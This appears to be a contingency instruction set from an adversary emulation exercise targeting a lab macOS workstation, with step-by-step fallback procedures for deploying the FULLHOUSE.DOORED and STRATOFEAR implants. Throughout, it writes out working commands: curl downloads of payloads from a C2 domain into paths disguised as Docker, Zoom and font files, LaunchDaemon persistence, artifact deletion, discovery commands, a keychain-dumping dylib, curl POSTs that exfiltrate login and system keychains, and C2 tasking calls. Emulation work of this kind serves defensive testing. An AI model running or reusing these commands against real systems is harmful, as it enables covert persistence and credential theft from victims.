This is the ALTERNATIVE instruction set for the Scenario
Legend of symbols:
- 💡 - callout notes
- ❗ - extremely important note
- ➡️ - Switching to another session
- ⭕ - Sign out of something
- :biohazard: - Procedure for a given step
This document provides alternative steps to perform if a particular portion of a step fails to execute. Due to the nature of the scenario and its components, not every part has a corresponding alternative step, and most alternative steps will sacrifice certain parts of the scenario, in particular the emulated TTPs.
Step 1 - Command and Control
Ruby script failed to download FULLHOUSE.DOORED
:biohazard: Tier 1 Procedures
➡️ From the Windows jumpbox
spitfire (
, initiate a VNC session to the macOS victim workstationhogshead (
.At the macOS login screen, authenticate with the following credentials:
Open a Terminal and elevate to sudo, providing the following password when prompted:
sudo su
Execute curl to download the FULLHOUSE.DOORED binary and configuration
curl --output "/usr/local/bin/com.docker.sock" http://b0ring-t3min4l.kr/files/com.docker.sock curl --output "/usr/local/bin/com.docker.sock.lock" http://b0ring-t3min4l.kr/files/com.docker.sock.lock
- The above resolves to:
- FULLHOUSE.DOORED binarycom.docker.sock.lock
- FULLHOUSE.DOORED configuration file
- The above resolves to:
Check using Finder to see if the files were downloaded successfully
Proceed with
Ruby script failed to execute FULLHOUSE.DOORED
Ruby script failed to execute FULLHOUSE.DOORED
:biohazard: Tier 1 Procedures
Change directory into
and execute FULLHOUSE.DOOREDcd /usr/local/bin chmod 0755 com.docker.sock ./com.docker.sock
➡️ On Kali, confirm C2 registration of FULLHOUSE.DOORED
➡️ On the Mac VNC session, close the Terminal and disconnect from the session
Step 2 - Persistence
FULLHOUSE.DOORED failed/unavailable to download STRATOFEAR
:biohazard: Tier 1 Procedures
If FULLHOUSE.DOORED is available:
hogshead (
:./evalsC2client.py --set-task 01A48A493AC92607E79CB427067C0A42 '{"id": 1, "arg": "curl --output \"/Library/PrivilegedHelperTools/us.zoom.ZoomHelperTool\" http://b0ring-t3min4l.kr/files/stratofear"}'
Task FULLHOUSE.DOORED to download STRATOFEAR's configuration file to
hogshead (
:./evalsC2client.py --set-task 01A48A493AC92607E79CB427067C0A42 '{"id": 1, "arg": "curl --output \"/Library/Fonts/pingfang.ttf.md5\" http://b0ring-t3min4l.kr/files/pingfang.ttf.md5"}'
Task FULLHOUSE.DOORED to download STRATOFEAR's LaunchDaemon plist file to
hogshead (
:./evalsC2client.py --set-task 01A48A493AC92607E79CB427067C0A42 '{"id": 1, "arg": "curl --output \"/Library/LaunchDaemons/us.zoom.ZoomHelperTool.plist\" http://b0ring-t3min4l.kr/files/startofear_launchd.plist"}'
Return to the emulation plan to task FULLHOUSE.DOORED to set STRATOFEAR as executable
If FULLHOUSE.DOORED is not available:
➡️ From the Windows jumpbox
spitfire (
, initiate a VNC session to the macOS victim workstationhogshead (
.At the macOS login screen, authenticate with the following credentials:
Open a Terminal and elevate to sudo, providing the following password when prompted:
sudo su
Execute curl to download the STRATOFEAR binary, configuration, and plist file:
curl --output "/Library/PrivilegedHelperTools/us.zoom.ZoomHelperTool" http://b0ring-t3min4l.kr/files/stratofear curl --output "/Library/Fonts/pingfang.ttf.md5" http://b0ring-t3min4l.kr/files/pingfang.ttf.md5 curl --output "/Library/LaunchDaemons/us.zoom.ZoomHelperTool.plist" http://b0ring-t3min4l.kr/files/stratofear_launchd.plist
Check using Finder to see if the files were downloaded successfully.
Proceed with
FULLHOUSE.DOORED failed/unavailable to set STRATOFEAR as executable
FULLHOUSE.DOORED failed/unavailable to set STRATOFEAR as executable
:biohazard: Tier 1 Procedures
➡️ From the Windows jumpbox
spitfire (
, initiate a VNC session to the macOS victim workstationhogshead (
.At the macOS login screen, authenticate with the following credentials:
Open a Terminal and elevate to sudo, providing the following password when prompted:
sudo su
Set STRATOFEAR as executable via chmod:
chmod 0755 /Library/PrivilegedHelperTools/us.zoom.ZoomHelperTool
If FULLHOUSE.DOORED is available:
- Return to the emulation plan to task FULLHOUSE.DOORED to execute STRATOFEAR via launchctl
If FULLHOUSE.DOORED is not available:
- Proceed with
FULLHOUSE.DOORED failed/unavailable to execute launchctl
- Proceed with
FULLHOUSE.DOORED failed/unavailable to execute launchctl
:biohazard: Tier 1 Procedures
➡️ From the Windows jumpbox
spitfire (
, initiate a VNC session to the macOS victim workstationhogshead (
.At the macOS login screen, authenticate with the following credentials:
Open a Terminal and elevate to sudo, providing the following password when prompted:
sudo su
Execute STRATOFEAR via launchctl:
launchctl load -w /Library/LaunchDaemons/us.zoom.ZoomHelperTool.plist
➡️ On Kali, confirm C2 registration of STRATOFEAR
❗ If the above procedure fails, proceed to
LaunchDaemon failed to execute STRATOFEAR
:biohazard: Tier 1 Procedures
➡️ From the Windows jumpbox
spitfire (
, initiate a VNC session to the macOS victim workstationhogshead (
.At the macOS login screen, authenticate with the following credentials:
Open a Terminal and elevate to sudo, providing the following password when prompted:
sudo su
➡️ On Kali, confirm C2 registration of STRATOFEAR
Step 3 - Defense Evasion
FULLHOUSE.DOORED failed to exit
:biohazard: Tier 1 Procedures
➡️ From the Windows jumpbox
spitfire (
, initiate a VNC session to the macOS victim workstationhogshead (
.At the macOS login screen, authenticate with the following credentials:
Open a Terminal and elevate to sudo, providing the following password when prompted:
sudo su
Delete the FULLHOUSE.DOORED artifacts:
rm -f com.docker.sock com.docker.sock.lock
Kill the FULLHOUSE.DOORED process:
pkill com.docker.sock
Step 4 - Collection
STRATOFEAR failed/unavailable to perform discovery
:biohazard: Tier 1 Procedures
If FULLHOUSE.DOORED is available download and execute discovery program to execute discovery commands.
Task FULLHOUSE.DOORED to download discovery program to
hogshead (
:./evalsC2client.py --set-task 01A48A493AC92607E79CB427067C0A42 '{"id": 2, "payload": "macho_discovery", "arg":"/Library/PrivilegedHelperTools/us.zoom.ZoomHelperTool-discovery"}'
Task FULLHOUSE.DOORED to add executable permissions to the discovery executable:
./evalsC2client.py --set-task 01A48A493AC92607E79CB427067C0A42 '{"id": 1, "arg": " chmod +x /Library/PrivilegedHelperTools/us.zoom.ZoomHelperTool-discovery"}'
Task FULLHOUSE.DOORED to execute the discovery program on
hogshead (
:./evalsC2client.py --set-task 01A48A493AC92607E79CB427067C0A42 '{"id": 1, "arg": "/Library/PrivilegedHelperTools/us.zoom.ZoomHelperTool-discovery"}'
If FULLHOUSE.DOORED is not available:
➡️ From the Windows jumpbox
spitfire (
, initiate a VNC session to the macOS victim workstationhogshead (
.At the macOS login screen, authenticate with the following credentials:
Open a Terminal and elevate to sudo, providing the following password when prompted:
sudo su
Execute the following commands:
logname /usr/sbin/system_profiler SPHardwareDataType /usr/bin/sw_vers dscl . -list /Users | grep -v '^_'
❗ If the above procedure fails, proceed to
STRATOFEAR failed/unavailable to load Keychain module
:biohazard: Tier 1 Procedures
If FULLHOUSE.DOORED is available:
Task FULLHOUSE.DOORED to download the dynamic library (dylib) to
hogshead (
:./evalsC2client.py --set-task 01A48A493AC92607E79CB427067C0A42 '{"id": 2, "payload": "libmodule_keychain.dylib", "arg":"/tmp/XYZ.tmp"}'
Task FULLHOUSE.DOORED to give executable permissions to the dylib:
./evalsC2client.py --set-task 01A48A493AC92607E79CB427067C0A42 '{"id": 1, "arg": "chmod +x /tmp/XYZ.tmp"}'
Task FULLHOUSE.DOORED to download the runner (mach-o):
./evalsC2client.py --set-task 01A48A493AC92607E79CB427067C0A42 '{"id": 2, "payload": "runnerPath", "arg":"/Library/PrivilegedHelperTools/us.zoom.ZoomHelperTool-Runner"}'
Task FULLHOUSE.DOORED to give executable permissions to the the runner program:
./evalsC2client.py --set-task 01A48A493AC92607E79CB427067C0A42 '{"id": 1, "arg": "chmod +x /Library/PrivilegedHelperTools/us.zoom.ZoomHelperTool-Runner"}'
Task FULLHOUSE.DOORED to execute the runner with the path (
) to the dylib: Note If the runner program is executed with no path provided it's default path is/tmp/ABCDEF.tmp
../evalsC2client.py --set-task 01A48A493AC92607E79CB427067C0A42 '{"id": 1, "arg": "/Library/PrivilegedHelperTools/us.zoom.ZoomHelperTool-Runner -p /tmp/XYZ.tmp"}'
If FULLHOUSE.DOORED is not available:
➡️ From the Windows jumpbox
spitfire (
, initiate a VNC session to the macOS victim workstationhogshead (
.At the macOS login screen, authenticate with the following credentials:
Open a Terminal and elevate to sudo, providing the following password when prompted:
sudo su
Execute curl to download the runner mach-o (
) and the dylib (XYZ.tmp
):curl --output "/Library/PrivilegedHelperTools/us.zoom.ZoomHelperTool-Runner" http://b0ring-t3min4l.kr/files/runnerPath curl --output "/tmp/XYZ.tmp" http://b0ring-t3min4l.kr/files/libmodule_keychain.dylib
Check using Finder to see if the files were downloaded successfully
Execute the runner to load and execute the dylib:
chmod +x /Library/PrivilegedHelperTools/us.zoom.ZoomHelperTool-Runner /Library/PrivilegedHelperTools/us.zoom.ZoomHelperTool-Runner -p /tmp/XYZ.tmp
Proceed to
STRATOFEAR failed/unavailable to exfil Keychain
STRATOFEAR failed/unavailable to exfil keychain
:biohazard: Tier 1 Procedures
If FULLHOUSE.DOORED is available:
Task FULLHOUSE.DOORED to upload the user's keychain file to the C2 server:
./evalsC2client.py --set-task 01A48A493AC92607E79CB427067C0A42 '{"id": 3, "arg":"/Users/ranrok/Library/Keychains/login.keychain-db"}'
Task FULLHOUSE.DOORED to upload the user's keychain file to the C2 server:
./evalsC2client.py --set-task 01A48A493AC92607E79CB427067C0A42 '{"id": 3, "arg":"/Library/Keychains/System.keychain"}'
Return to the emulation plan
If FULLHOUSE.DOORED is not available:
➡️ From the Windows jumpbox
spitfire (
, initiate a VNC session to the macOS victim workstationhogshead (
.At the macOS login screen, authenticate with the following credentials:
Open a Terminal and execute curl to upload the user's Keychain files to the C2's File server:
curl -X POST -H "filename:usersKeychain" --data-binary @/Users/ranrok/Library/Keychains/login.keychain-db http://b0ring-t3min4l.kr/uploads
- Open a Terminal and execute curl to upload the user's Keychain files to the C2's File server:
curl -X POST -H "filename:systemKeychain" --data-binary @/Library/Keychains/System.keychain http://b0ring-t3min4l.kr/uploads
- Check the C2 server to verify the files were uploaded successfully.
STRATOFEAR failed/unavailable to monitor devices
:biohazard: Tier 1 Procedures
If FULLHOUSE.DOORED is available:
Task FULLHOUSE.DOORED to download the device monitor executable (mach-o) to the system:
./evalsC2client.py --set-task 01A48A493AC92607E79CB427067C0A42 '{"id": 2, "payload": "macho_monitorDevices", "arg":"/Library/PrivilegedHelperTools/us.zoom.ZoomHelperTool-monitor"}'
Task FULLHOUSE.DOORED to give the device monitor executable permissions to run:
./evalsC2client.py --set-task 01A48A493AC92607E79CB427067C0A42 '{"id": 1, "arg": "chmod +x /Library/PrivilegedHelperTools/us.zoom.ZoomHelperTool-monitor"}'
Task FULLHOUSE.DOORED to execute the device monitor.
./evalsC2client.py --set-task 01A48A493AC92607E79CB427067C0A42 '{"id": 1, "arg": "/Library/PrivilegedHelperTools/us.zoom.ZoomHelperTool-monitor"}'
If FULLHOUSE.DOORED is not available:
➡️ From the Windows jumpbox
spitfire (
, initiate a VNC session to the macOS victim workstationhogshead (
.At the macOS login screen, authenticate with the following credentials:
Open a Terminal and elevate to sudo, providing the following password when prompted:
sudo su
Execute curl to download the device monitor mach-o (
):curl --output "/Library/PrivilegedHelperTools/us.zoom.ZoomHelperTool-monitor" http://b0ring-t3min4l.kr/files/macho_monitorDevices
- The above resolves to:
- a mach-o that installs a monitor on the/Volumes
folder. When devices are mounted, the program will print out the event and append it to the/Library/Fonts/AppleSDGothicNeo.ttc.1
- The above resolves to:
Check using Finder to see if the files were downloaded successfully
Execute the device monitor:
chmod +x /Library/PrivilegedHelperTools/us.zoom.ZoomHelperTool-monitor /Library/PrivilegedHelperTools/us.zoom.ZoomHelperTool-monitor
End of Emulation